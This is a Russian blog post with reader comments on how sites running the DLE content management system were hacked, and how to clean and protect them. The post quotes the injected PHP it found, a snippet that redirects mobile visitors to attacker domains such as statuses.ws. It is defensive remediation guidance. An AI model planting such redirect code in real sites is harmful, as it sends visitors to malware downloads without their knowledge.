Как ломали сайты на DLE

Воскресенье, 10 Фев 2013 5:12

Как ломали сайты на cms DLE
Начало. Уязвимость в сайтах на движке
Как видим, добавился не только новый домен http://yacounter.ws (ну любит злоумышленник зону ws, что тут поделатьsmile), но и eval.
Но и за первую версию также есть случаи, которые говорят следующее.
В файлах движка цмс  dle появляется совсем другой код, например, такой:

if(stripos($_SERVER[‘HTTP_USER_AGENT’],”Android”)!==false)
{header(‘Location: http://refresh-browser.00xff.net/’);exit;}

Как видим, домен здесь совсем другой. Кроме того, были выявлены следующие факты:
– в главном шаблоне сайта, main.tpl, в яваскриптах появляются посторонние строки;
– кто-то меняет кодировку шаблона, после чего пропадает весь русский текст (я думаю, что кодировку никто не меняет, просто-напросто так действует посторонний код);
– опять-таки в файле main.tpl едет вниз или в  сторону вёрстка шаблона,  что снова говорит о присутствии постороннего кода;
– в индексном файле появляются посторонние java-скрипты;
– появляются пользователи с правами администраторов, появляются сообщения о каких-то «левых» действиях в админ-панели сайта, меняются рекламные баннеры.
Как предотвратить взлом сайта?

Как ни банально это звучит, для того, чтобы предотвратить взлом сайтов, надо, как минимум, выполнять следующие требования (о которых, конечно же, все знают, но по разным причинам не делают):
– обновлять программное обеспечение на компьютере, устанавливать своевременно все новые патчи, закрывающие обнаруженные уязвимости;
– установить антивирус и постоянно обновлять антивирусные базы;
– не скачивать сомнительные файлы, не переходить по подозрительным ссылкам из электронной почты, скайпа, аськи и т. д.
А теперь что касается непосредственно защиты dle-блогов.
Что мы имеем:
На всех сайтах дле вначале регистрировался бот, по следам которого шёл хакер и заливал на сайты шелл.
Дата файлов, которые были изменены,  оставалась такой же.
Версия ДЛЕ роли не играла, так же не играло роли то,  была ли установлена лицензионная или же нуленная версия DLE.
На форумах упоминалось про то, что возможно играли соответствующую роль настройки сервера на хостинге. Однако я думаю, что это касалось только тех серверов, которые администрировались самостоятельно опытными админами. На общих хостингах настройки роли не играли, так как были взломаны сайты на следующих площадках: iphoster, webhost1.ru, ihc, фест.
И самое главное – взломы произошли там, где была разрешена регистрация новых пользователей. Отсюда сразу  следует вывод, который напрашивается сам собой: запретить регистрацию новых пользователей, по крайней мере, до поры-до времени, пока производитель данной CMS не закроет окончательно все дыры в движке. Хотя он и утверждает, что дыр на сегодняшний момент в ДЛЕ нет. Кстати, на днях вышла новая версия движка, dle 9.8, но это так, к слову.
Если же, как утверждают некоторые, у них такие высокопосещаемые проекты, на которых ну никак нельзя запретить регистрацию, то можно, например, добавлять новых пользователей через ручную регистрацию, по заявке, чтобы исключить регистрацию новых  ботов.  И ещё советовал бы удалить всех подозрительных пользователей, таких как tehApocalypse, зарегистрированных в конце декабря – в январе этого года.
Как можно запретить регистрацию новых пользователей в ДЛЕ? Просто  в настройках системы – «Настройки для пользователей» – «Максимальное количество зарегистрированных пользователей», ставите 1 или любое другое число, не превышающее количество уже зарегистрированных юзеров.
А можно сделать немного по-другому. Если вы по каким-то причинам не хотите обновляться до последней версии движка или  устанавливать все патчи  безопасности (к примеру, не хотите потерять все установленные моды или у вас не лицензионная копия), можно запретить загрузку аватаров на сайт. Чтобы отключить загрузку аватаров, идёте в «Настройка групп пользователей» – нужная группа  – в пункте  «Максимальный размер аватара» ставите 0. Таким образом, вы запретили загрузку аватаров на сервер. Для этого можно создать специальную группу и всех новых пользователей помещать туда.
Теперь что касается  такого варианта, когда меняются индексные файлы, прописываются посторонние строки, JS-скрипты, появляются новые пользователи с правами администраторов. Возможно, тут дело идет всего-навсего про брутфорс (то есть банальный подбор паролей), поскольку есть информация, что некоторые админы ставили до безобразия простые пароли, плюс в логах сервера наблюдалась небывалая активность  к файлу админпанели. (Его, кстати говоря, тоже не мешало бы поменять). А вот когда все посторонние пользователи удалялись и пароли менялись, то и подобные случаи также прекращались.
Ну а теперь поговорим про очистку сайтов от вредоносного кода.
Как можно избавиться от данного кода? Очень просто – для этого надо открыть все зараженные файлы в Total Commander или  в любом блокноте наподобие  Notepad++  и удалить указанные выше строки, а также установить все патчи безопасности, выложенные на официальном сайте. В противном случае вредоносный код появится опять на сайте в самое ближайшее время.
А так же, как вариант, закрыть регистрацию на сайте, запретить загрузку аватаров на сайт.
А теперь по порядку.
Взлом сайтов dle  линейки 9.x
1. Блокнот. Если у вас нет никакого нормального блокнота, кроме стандартного виндусного, в срочном порядке скачивайте нормальный блокнот наподобие   Notepad++. Скачать его можно с официального сайта.    Этот блокнот выручит вас не раз в самых разных ситуациях.
Например, вы решили установить себе сайт на CMS Вордпресс.
Там необходимо будет править некоторые файлы, такие как wp-config и другие. Так вот, если делать это в обычном блокноте, может выскочить такая или похожая ошибка «Warning: Cannot modify header information – headers already sent by (output started at  сайт/wp-config.php:1)» Происходит это из-за того, что стандартный виндоуский блокнот добавляет в начало файла сигнатуру BOM – Byte Order Mark. Вывод: пользуйтесь правильными блокнотами, такими как Ноутпед++.
2. Скачивайте все файла зараженного сайта на компьютер, если сайт очень большой, папку uploads можете не качать, там находятся закачанные файлы ваших сообщений. Все файлы помещаете в отдельную папку, назвав её, скажем virus.
3. Открываете блокнот, нажимаем «Найти»  (Ctrl+F). Вкладка «Найти в файлах». Вводим имя домена, на который идет редирект, к примеру, statuses.ws. В поле «Папка» выбираем нашу папку /virus со скачанным  сайтом. Жмём «Найти все». После непродолжительного поиска будут показаны отдельным списком внизу блокнота все файлы, в которых прописалась эта зараза.
4. Открываем по очереди все указанные файлы и чистим их от постороннего кода – аккуратно удаляем те участки кода, примеры которого приведены выше в данной статье. То есть удаляем не просто http://statuses.ws/, а весь код:

$iphone = strpos($_SERVER[‘HTTP_USER_AGENT’],”iPhone”);
$android = strpos($_SERVER[‘HTTP_USER_AGENT’],”Android”);
$palmpre = strpos($_SERVER[‘HTTP_USER_AGENT’],”webOS”);
$berry = strpos($_SERVER[‘HTTP_USER_AGENT’],”BlackBerry”);
$ipod = strpos($_SERVER[‘HTTP_USER_AGENT’],”iPod”);
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header(‘Location: http://statuses.ws/’);

5. После этого проверяем всё ещё раз, если посторонний код больше не находится, заменяем все измененные файлы на сервере по фтп.
6. Ну и чтобы повторно не дать залить shell на сайт, принимаете все описанные выше меры предосторожности.
И напоследок, чтобы немного развеяться,  видео про сео от алматинского  сеошника:

И традиционный анекдот, на этот раз про хакеров:
Встречаются два хакера. Один хакер говорит другому:
– Вчера встретил такую потрясающую блондинку в ночном клубе.
– Да, и что?!
– Потанцевали, потом  пригласил ее к себе на чашку кофе.
– Да ну!
– Ага, и когда мы вошли ко мне, она полностью разделась.
– Ну а дальше то что?!
– А потом я посадил её на стол, где стоит компьютер…
– У тебя дома компьютер?! А какой процессор?smile
Всем удачи!

    Подпишитесь на комментарии, чтобы не пропустить
    важный ответ:



подписка на rss RSS - подписка
    подписка twitter Twitter - подписка

Вы можете оставить отзыв или трекбек со своего сайта.

Отзывов: 44 на «Как ломали сайты на DLE»

  1. Уязвимость в сайтах на движке dle | SEO-semki пишет:

    10 Фев 2013 в 05:15

    […] Как ломали сайты на DLE Поделиться записями в социальных […]

  2. Мясник пишет:

    10 Фев 2013 в 12:39

    спасибо, очень полезная статья!

    [Ответить]

    seo Reply:

    Да, там главная фишка в том, что взломы производил именно зарегистрированный пользователь. Нет регистрации – нет взлома.

    [Ответить]

  3. Виндос пишет:

    10 Фев 2013 в 16:34

    Плять, я в шоке. Тоже ламанули два сайта, версия 9.2 стояла ,прописали эту херотень. А я думаю, что это у меня так трафик резко начала падать, почистил, посмотрим, нда :evil:

    [Ответить]

  4. игнат пишет:

    22 Фев 2013 в 13:59

    Премного благодарен! Кто предупрежден ,тот вооружен!

    [Ответить]

  5. Оксана пишет:

    23 Фев 2013 в 10:23

    Никогда бы не подумала, что такое возможно ((

    [Ответить]

  6. Leo пишет:

    26 Фев 2013 в 15:13

    Вроде бы все почистил у себя а пере направление на сторонний сайт все равно осталось (если заходить с мобильного устройства). Какие еще могут быть варианты вычистить сайт?

    [Ответить]

    seo Reply:

    Что-то не заметил у вас никакого перенаправления, уже всё поправили?

    [Ответить]

  7. Эри пишет:

    15 Мар 2013 в 20:55

    Привет
    Вот у меня тоже взломали, у меня и раньше такое случалось, но в этот раз, вообще све сложнее, даже реклама прокручивается на сайте онлайн игры, только вот после того как я удаляю все эти левые перенаправления сайт сразу падает, что делать  от всяких онлайн сервисов на проверку толку никакого

    [Ответить]

    seo Reply:

    Привет,
    не понятно какая реклама и что за сайт онлайн-игры :?:

    [Ответить]

  8. Николай пишет:

    27 Мар 2013 в 10:43

    Взломы dle продолжаются, как это всё достало! Придется переходить на другой движок cms :twisted:

    [Ответить]

  9. Евгений пишет:

    21 Май 2013 в 23:49

    А подскажите пожалуйста какие права должны стоять по ftp?

    [Ответить]

    seo Reply:

    По фтп? Ну наверное такие же, как и без фтп))

    [Ответить]

    Евгений Reply:

    А какие именно? На какие папки, файлы..и все таки какие?

    [Ответить]

    seo Reply:

    Согласно инструкции по установке движка dle права на файлы/папки ставятся следующим образом:
    Для папки templates и всех вложенных в неё папок – 777;
    для всех файлов в папке templates – 666;
    для папок backup, uploads, а также для всех папок внутри них – права 777;
    для папок /engine/data/, /engine/cache/, /engine/cache/system/ – также права chmod 777.

    [Ответить]

    Евгений Reply:

    Автору респект за помощь!

    [Ответить]

    seo Reply:

    Всегда пожалуйста :!:

    [Ответить]

  10. dima пишет:

    26 Май 2013 в 22:48

    Помогите уже второй раз удаляю этот вирус, а перенаправление с мобильной версии все равно идет… :|

    [Ответить]

    seo Reply:

    Да, ваш сайт взломан, с мобильного идет переадресация сначала на сайт _http://dll-opera.com, затем на _http://mobi-service7.com, где предлагается скачать экзешный файл.
    В принципе особых проблем здесь не вижу, вы не до конца удалили вредоносный код, поэтому идет редирект. Какие файлы чистили?
    В статье http://seo-semki.ru/xaking-hacking/uyazvimost-v-sajtax-na-dvizhke-dle.html, в самом начале указано, какие файлы обычно поражаются в первую очередь, кроме того, проверьте файл .htaccess, полагаю, что вы его не смотрели.

    [Ответить]

    seo Reply:

    Пс. Кстати, вот эти ссылки вы размещали?:
    _http://www.freeversions.ru/skype-free-download
    _http://windows8center.ru/minecraft-dlya-windows-8.html
    Ппс. Вас должна греть мысль, что вы не одиноки в этом мире, похожие проблемы есть у многих других сайтов, например,
    mp3-load.ru
    suchan-gazeta.com
    sauketeso.org

    [Ответить]

    dima Reply:

    Все файлы еще раз перепроверил кода не нашел, файлы .htaccess тоже проверял и в некоторых был не нужный код, все убрал и выставил права 444, но вирус так и остается жить на сайте, вчера яндекс написал что сайт содержит код, который может быть опасен для посетителей, что еще посоветуете сделать?

    [Ответить]

    seo Reply:

    Такого просто не может быть, такой редирект не может взяться ниоткуда, тут два варианта – либо вы не всё удаляете и код остается, либо вы всё удаляете, но его прописывают заново.
    Склоняюсь к первому варианту. Вы поставили запрет на загрузку анимированных аватарок?

    [Ответить]

  11. Гуакамоле пишет:

    30 Май 2013 в 18:18

    Хорошая статья, но хочу вас заверить, что любой движок имеет дыры, через которые ломают сайт, а именно скрипты, базы данных. Но есть решение, конечно это мало кому понравиться, но есть неуязвимый сайт, который чтоб взломать, нужно валить целый сервер на котором находиться сайт жертва, это голый безскриптовый НТМЛ.

    [Ответить]

    seo Reply:

    Предлагаете всем переходить на голый HTML? smile

    [Ответить]

    Гуакамоле Reply:

    Да, и после этого процентов 95% всех взломов прировняются к нулю. Школота, то точно не порвет НТМЛ, умрет но не порвет  :lol:

    [Ответить]

    seo Reply:

    Школота нынче упорная пошла :mrgreen:

    [Ответить]

    Алексей Reply:

    да у меня на сайте кто то упорно пытается подобрать пароль меняя айпи

    [Ответить]

    seo Reply:

    Боты наверное. А в чём выражается “пытается подобрать пароль”?

    [Ответить]

  12. sheval пишет:

    03 Июл 2013 в 22:36

    Привет брат! сто лет не заходил на твой сайт! смотрю ты пироги рассматриваешь и шелы…ну если подумать про конечный результат.
    Как у тебя арбитраж..все на нем?…

    [Ответить]

    seo Reply:

    Здарова, брат-уха! И тебе не хворать! smile
    Скорее не пироги, а пирожки ;)

    [Ответить]

  13. Анна пишет:

    29 Июл 2013 в 14:07

    Помогите мне пожалуйста, я пересмотрела уже все что возможно, может и что-то упустила, но уже бьюсь больше месяца, вот наткнулась на Ваш сайт, сделала все что написано, но нечего не находит, но проблема присутствует. Помогите пожалуйста разобраться.

    [Ответить]

    seo Reply:

    А какая проблема, не вижу пока никакой проблемы.

    [Ответить]

    Анна Reply:

    С мобильно когда заходишь, на сайт не переходит, а хочет скачать файл. Не возможно зайти ни с айфона, ни с андроида. Переискала весь код, но нечего найти не могу

    [Ответить]

    seo Reply:

    Какой файл хочет скачать и откуда (урл)?
    Если ничего не нашли – значит плохо смотрели. Неужели за месяц так вообще ничего и не смогли найти?

    [Ответить]

    Анна Reply:

    нечего не могу найти, постоянная проблема, совершенно не знаю что делать

    [Ответить]

    seo Reply:

    Ну тогда надо непосредственно все файлы смотреть, так трудно что-то сказать.

    [Ответить]

  14. Иван пишет:

    15 Дек 2013 в 10:36

    Прочёл статью до конца. Спасибо! На Моём тоже какая-то хрень живёт. Причём нагружает процессор хостера, а лимит-то минимальный. Уже даже отключали сайт. при переписке с техподдержкой выяснилось, что происходит постоянная регистрация новых пользователей. Регистрацию прекратил сменой с упрощёноой системы регистрации на расширенную. Нагрузка на сервер прекратилась, но проблема не решена.

    [Ответить]

    seo Reply:

    Пожалуйста.
    Так в чём проблема-то, если в нагрузке на сервер, так вы же в конце сообщения написали, что после включения расширенной регистрации нагрузка на сервер прекратилась?

    [Ответить]

  15. Поговори со своим компьютером | SEO-semki пишет:

    22 Дек 2013 в 12:05

    […] как Notepad, подробнее про него можно почитать здесь: Как ломали сайты dle). 2) Наберите в блокноте или просто скопируйте в него […]

  16. Как защитить сайт от взлома | SEO-semki пишет:

    16 Янв 2014 в 22:38

    […] Второе – регулярно обновлять файлы движка и плагинов до новой версии. Проверять и скачивать все новые обновления безопасности (патчи), закрывающие найденные уязвимости, что особенно актуально для сообщества Dle. […]

  17. Взлом сайта Вордпресс | SEO-semki пишет:

    19 Фев 2014 в 07:29

    […] так давно я рассказывал про взлом Dle – сайтов,  а сегодня расскажу вам  увлекательную историю про […]

  18. Валик пишет:

    10 Апр 2014 в 02:21

    У кого-то осталась сама аватарка с помощью которой ломали?

    [Ответить]

    Саман Reply:

    У меня осталась.

    [Ответить]

  19. Саман пишет:

    25 Ноя 2014 в 17:34

    Дле сама по себе дырявая, потому что разработки российские, вы никогда не задумывались, почему зарубежные движки гораздо практичнее и защищеннее чем наши, отечественные разработки? Потому что за рубежом думают как защитить движок от взлома, а у нас думают, как его сломать. Все дело в психологии, менталитете людей и его очень трудно изменить. Кроме того, в dle есть крот, который работает на два фронта, и вашим и нашим, поэтому у них столько дыр.
    И что самое обидное, администрация не признает ошибки и пытается их скрыть.

    [Ответить]

Ваш отзыв

http://seo-semki.ru/icons/wpml_bye.gif 
:bye:
http://seo-semki.ru/icons/wpml_good.gif 
:good:
http://seo-semki.ru/icons/wpml_negative.gif 
:negative:
http://seo-semki.ru/icons/wpml_scratch.gif 
:scratch:
http://seo-semki.ru/icons/wpml_wacko.gif 
:wacko:
http://seo-semki.ru/icons/wpml_yahoo.gif 
:yahoo:
http://seo-semki.ru/icons/wpml_cool.gif 
B-)
http://seo-semki.ru/icons/wpml_heart.gif 
:heart:
http://seo-semki.ru/icons/wpml_rose.gif 
:rose:
http://seo-semki.ru/icons/wpml_smile.gif 
:-)
http://seo-semki.ru/icons/wpml_whistle3.gif 
:whistle:
http://seo-semki.ru/icons/wpml_yes.gif 
:yes:
http://seo-semki.ru/icons/wpml_cry.gif 
:cry:
http://seo-semki.ru/icons/wpml_mail.gif 
:mail:
http://seo-semki.ru/icons/wpml_sad.gif 
:-(
http://seo-semki.ru/icons/wpml_unsure.gif 
:unsure:
http://seo-semki.ru/icons/wpml_wink.gif 
;-)